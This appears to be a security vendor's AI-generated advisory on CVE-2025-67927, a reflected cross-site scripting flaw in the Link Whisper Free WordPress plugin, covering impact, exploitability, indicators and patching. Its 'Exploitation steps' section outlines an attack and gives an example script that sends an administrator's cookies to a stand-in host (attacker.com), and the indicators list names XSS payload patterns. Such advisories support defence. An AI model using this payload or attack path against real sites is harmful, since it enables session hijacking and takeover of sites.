CVE-2025-67927
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-67927 is a Reflected Cross-Site Scripting (XSS) vulnerability in the Link Whisper Free WordPress plugin by Spencer Haws. It affects all versions of the plugin through and including 0.8.8, with version 0.8.9 being the first patched release. The vulnerability was reported by Ryan Novotny on October 20, 2025, and published by Patchstack on January 5–8, 2026. It carries a CVSS v3.1 base score of 7.1 (High) as assessed by Patchstack (Patchstack).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically a Reflected XSS variant. Exploitation occurs when unsanitized user-supplied input is reflected back in the plugin's web page output without proper encoding or escaping, allowing an attacker to inject arbitrary JavaScript. No authentication is required to initiate the attack, though successful exploitation requires a privileged user (e.g., an administrator) to interact with a crafted malicious link or page. No public proof-of-concept code has been identified at this time (Patchstack).

Impact

Successful exploitation allows an attacker to inject and execute malicious scripts in the context of a victim's browser session on the affected WordPress site. This can lead to session hijacking, credential theft, unauthorized administrative actions, or redirection of site visitors to malicious content. The scope is changed (cross-origin), meaning the injected script can affect resources beyond the vulnerable plugin itself, impacting both confidentiality and integrity of the site (Patchstack).

Exploitability

No confirmed in-the-wild exploitation has been reported for CVE-2025-67927. The EPSS score is approximately 0.029% (0.000290), indicating a low current probability of exploitation. No exploit kits or threat actor attribution have been identified. However, Patchstack notes that vulnerabilities of this class are commonly used in mass-exploit campaigns targeting WordPress sites at scale, regardless of site popularity (Patchstack). The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog.

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the Link Whisper Free plugin at version 0.8.8 or earlier using tools like WPScan or Shodan with WordPress-specific fingerprinting.
  2. Craft malicious URL: Construct a URL targeting the vulnerable plugin parameter that reflects unsanitized input, embedding a JavaScript payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>).
  3. Deliver the payload: Send the crafted URL to a privileged WordPress user (e.g., administrator) via phishing email, social engineering, or by embedding it in a comment or message on the site.
  4. Trigger execution: When the privileged user clicks the link and their browser loads the reflected response, the injected script executes in their browser session.
  5. Achieve objective: The attacker captures session cookies, performs unauthorized administrative actions, or injects persistent malicious content into the site (Patchstack).

Indicators of compromise

  • Network: HTTP requests to WordPress pages containing URL-encoded script tags or JavaScript event handlers in query parameters associated with the Link Whisper Free plugin endpoints.
  • Logs: WordPress or web server access logs showing GET/POST requests with suspicious payloads (e.g., <script>, onerror=, javascript:) in parameters handled by the link-whisper plugin.
  • File System: Unexpected modifications to WordPress theme files or the addition of unauthorized admin accounts, which may indicate post-exploitation activity following session hijacking.
  • Browser/Session: Reports from administrators of unexpected redirects, pop-ups, or unauthorized changes to site settings after clicking links related to the plugin.

Mitigation and workarounds

The primary remediation is to update the Link Whisper Free plugin to version 0.8.9 or later, which contains the fix for this vulnerability. Site administrators who cannot immediately update should consider using Patchstack's virtual patching/mitigation rule, which blocks exploit attempts at the WAF level until the plugin is updated. Restricting access to WordPress admin areas via IP allowlisting can also reduce the attack surface for social engineering-based delivery of the malicious link (Patchstack).

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-3174HIGH7.5
  • event-tickets
NoYesSep 08, 2026
CVE-2026-18021MEDIUM6.5
  • beaver-builder-lite-version
NoYesSep 08, 2026
CVE-2026-17509MEDIUM6.5
  • sitepress-multilingual-cms
NoYesSep 08, 2026
CVE-2026-76931MEDIUM6.4
  • zephyr-project-manager
NoYesSep 08, 2026
CVE-2026-2520MEDIUM5.4
  • bookly-responsive-appointment-booking-tool
NoYesSep 08, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management